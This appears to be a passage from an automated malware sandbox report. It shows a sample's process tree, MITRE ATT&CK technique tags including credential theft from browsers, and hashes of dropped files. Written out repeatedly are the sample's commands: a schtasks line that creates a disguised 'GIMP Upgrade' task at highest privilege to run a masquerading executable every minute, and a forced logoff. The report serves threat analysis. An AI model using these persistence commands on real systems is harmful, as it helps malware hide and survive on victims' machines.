C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Shutdown /l /f2⤵
-
C:\Windows\system32\shutdown.exeShutdown /l /f3⤵
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\Users\Public\Pictures\xdwdNode.js.exe"C:\Users\Public\Pictures\xdwdNode.js.exe"1⤵
- Executes dropped EXE
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa390f855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Event Triggered Execution
1AppInit DLLs
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Event Triggered Execution
1AppInit DLLs
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5425248739d77afa964e1a893d2ea5a94
SHA1ae91c41cde6ffe01839ae7e61b193c241d18a513
SHA256816b3a135562fe43c926caa3e9f2b6271ec5fd7e44d6a05dbc6d7cf9504aa254
SHA512c4dde9efb7f500f7216d83e9327b03a1905568da3a7346668100792d4309fce8ac2ef1fe6124ae06a4686762b4b41d5ab7a64343c446b60c301c8283d9547c37
-
Filesize
283KB
MD51fdf29fb68d0327ef21f54c644a5e5f7
SHA1064a8c39517bc9b08e8f27a9a5cf31f22aa275ca
SHA256b60295370110a4d49f3f4b29296d7fd598cbe6443272e612749155c8f0381571
SHA512b5181fab5e69cc7ce1ebe8f59df7ebce49f759eb46ea3a3d73ffab5ccfe2ec57e071e94e027e13278543852abd7e579fce25286e96335562952efac0a6f1fdb8
-
Filesize
144B
MD53e5e1119d89877b6025129c9db7f6913
SHA16761fe8e397350f40eff53f3d314c579160c85d4
SHA25637ab6d841b44aa91b645b01d67d912ceb64bd42972bebd631ff60f59072493f4
SHA512910a52f7b2c69ef724db6354080942ca247e22bd9f2131a183080f95a54541b7d229c392babf22ad7e16ae4541838ad45c11c202344fa25fd6259a45fec692e0
-
Filesize
20KB
MD543e2b4ccb64e3cc69316ae7f229cf73a
SHA159ab3215fad69db77120a1ae56a9870ae20ec8cd
SHA256bc664315c1ee83af3768d3bd1371e9f8cb9d8a181dc92340a085165058b4bb34
SHA512ed091d0ed038bcde431ff3fc687e6989c4914f1c6ba4e4c00989d4ecc0646382603d6d888e92a351f4aa5b52d3ff096718d5d90424d66fd72a9300e448aac7ff
-
Filesize
124KB
MD554e62193af99c59df64aedf85b3c8a10
SHA1ef7f889c934fdf4dd749c92f4d26571053a5c156
SHA256007ba524ee335e80683a64c4504a448d165dc251d337be848f0f484abfccc804
SHA512e6161dd88ed23feef79b7ac121db318be4a7500152c5fba64db5570355ec002e34a4174369bdb042cd5894b8e8d0255fc5ac1e8470647d9015994ff03404b1ae
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
930B
MD59f9048f2157f63143e0f48fb999b7a7e
SHA1daeda0cb45f09ac72143674dba0589ac7a9a3a1c
SHA2560b554038b53b4e5a06aa95be97de4f80d3d0120f4e9d6c4f3c505f8bf1484564
SHA5127bd00c69505faca0e07572ba0e0a32d315807a1243485d93318b3807df4c0eee1d796b4a9b16f3934044c52b0b5ecda46ec9ef5800188b2377dcdf65aa555a1f
-
Filesize
1KB
MD55a40605f39f83de449f855008753a566
SHA114a18ae86758a36449823128a9546caa845ad75f
SHA25690f26ee89d1006c513268fbad387d99fd7b0b0ed135e8e905c84be0b2492319c
SHA512a81386bc034002d019622dffa1f082d5be7835cd046e2ad49cc38c4b491527561518f2893c2b99183de6bf3049fbaeb4338ff4e06283ace4d33da00ffc8ffcfe
-
Filesize
6KB
MD58e0bae28e912b3e9f6b36df981054335
SHA1eceeb9f934af3e54e9890c424c38497860b56e1b
SHA256dd1a02eedb8946a9d8b5147d7433212cb0d89b8bf12568c92959dd21f161228d
SHA512de5805a4d8b3e9731a2ff7806ac3c5a3d0dc3e0cced462e6fd01d1199484874f2d3d86fd932315bfef98d6170ebd9287f71c7d52552b66ea1bd1a52346f13192
-
Filesize
5KB
MD5f13166f8c67cce1fae5fbf407a12054f
SHA1de51e479b413f317b4ba571bcb3ca1d0ecfbf218
SHA2563c0f14f76e83f0e48037f93cf501b427f7a72f1a0316678fd4c5b6ca5be6dd57
SHA5127afcb28b93d8887d2f9a184f50cbc41070706d2320621c6fb43808000054e87fcb3a90ae24102488c5d316482047d37cc6d16c6b896f11a5c3bc4002fcabb675
-
Filesize
24KB
MD5dcb3a22320d5a33a1efa1b4847ea4bcb
SHA1a593fdbecd26610c1891961c378941baf8560398
SHA25633e7feba556087bb8a0abd289b518350b77d05b7a551700fad1955048e59ef85
SHA5120ebb797fc67e557d0960f80e5c039efc238cb64edc3a7fccc39eb2142ada726ed91498e83abb725017953c3c900943364793c8e6f952a7c2784e27748d83d2b0
-
Filesize
112KB
MD5e03fc0ff83fdfa203efc0eb3d2b8ed35
SHA1c705b1aa42d84b3414fdc5058e0fa0a3dc9e1664
SHA25608d550d1866b479c6c41ebbda7b453dba198ee8744a52c530ff34458024ee1fe
SHA512c0840930d7a9cf16e8fbefefd09c564eabfcfb6e9df1f9b906b830e8218a818c3f9721f9ce1fc2a96b2e6ce725baba0dcd5810a9b55d20b3c9d6f4569b9008a2
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD5f728116f21163f6fa60a797da6bfd6cc
SHA13378d651d43abffea36bc9aca42d9adeb41d711d
SHA256c8c110d30d4e902e1282af79c9c3283e32495ab6a82d38fd605186fd2f30b237
SHA512eea2d1e3774e7b4af43f769590ebf0949b1a6de457c40f10fec0fafa6af21c35b9741f6020a013e11ca87bbd1bd3efd111d5581c5f444449b04cd0d14ce25370
-
Filesize
10KB
MD58736de0781de202e5be801d75546bd88
SHA1db382676235d2b65aff99c37bcb26821f1356610
SHA256df2eb5e0b64a1ba0b7104e412c8a861765a07e9a59dbd8b66f9c466b99144d51
SHA512a5484e18fc50442b981a1c01fae3c1f73c79e2c8ffb3a2a33680e73a9c53936698d40740241432b3fe29f974508d627bd52bea8580499d2527c4d66c43fa551d
-
Filesize
105B
MD52e9d094dda5cdc3ce6519f75943a4ff4
SHA15d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
29B
MD587e77adcbe40991e28b91bce6a02f996
SHA17bee296879fb13ddd1ce42eabf77d04eb5553915
SHA25697109404dd67bb897545c5d886bc472c7bb25bef10e187a6b78b74d80b644bb8
SHA51206d83e5ee3ebbb7a1a6a86cebde1689f8266af735d2e9b6ea6be596ffe524656fb338559f3525674a60821f1127595ac9c1cedbf9ecef8f1dee40cf71adfbe59
-
Filesize
74B
MD5c7f4412424e593facb6c533276d517bf
SHA1fa44837d6e8c87da4a85b17d5801af43789bab9f
SHA256e5043dbea2de04275642b47dc501dda26675f7051ab1a3c2e0511a9084811a28
SHA5128dd5a1ec3002637c77437b98590dcd501d621261bc105c55d83d7ec4fca1e4ef599c51f8b3f2e57e9a049b3e623cfc27414785d628369452e3c94adcb5536c9f
-
Filesize
7KB
MD5aa5d13590623abb5d3963a8af5dfb85d
SHA18dcb62e75f970ac4f9f78e2558f335951b599774
SHA2564c6183029dcf2e4d604c473c2dfb4f72037b6a8f13d9183b0842fd201e422d7a
SHA51294899bfebc29d4d76c1a8d0e9b787ae50386a5e8718194791d27d86eb7e67e1b0e1a9b0a4e68031905c767419bd767b9d2666ac5ffd0a8dd87c0bf842ac7282b
-
Filesize
136KB
MD516e5a492c9c6ae34c59683be9c51fa31
SHA197031b41f5c56f371c28ae0d62a2df7d585adaba
SHA25635c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA51220fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
616KB
-
Filesize
48KB
-
Filesize
120KB
-
Filesize
120KB
-
Filesize
472KB
-
Filesize
304KB
-
Filesize
48KB
-
Filesize
1020KB
-
Filesize
32KB
-
Filesize
320KB
-
Filesize
256KB
-
Filesize
1020KB
-
Filesize
72KB
-
Filesize
40KB
-
Filesize
136KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1020KB
-
Filesize
1020KB
-
Filesize
1.3MB
-
Filesize
1.3MB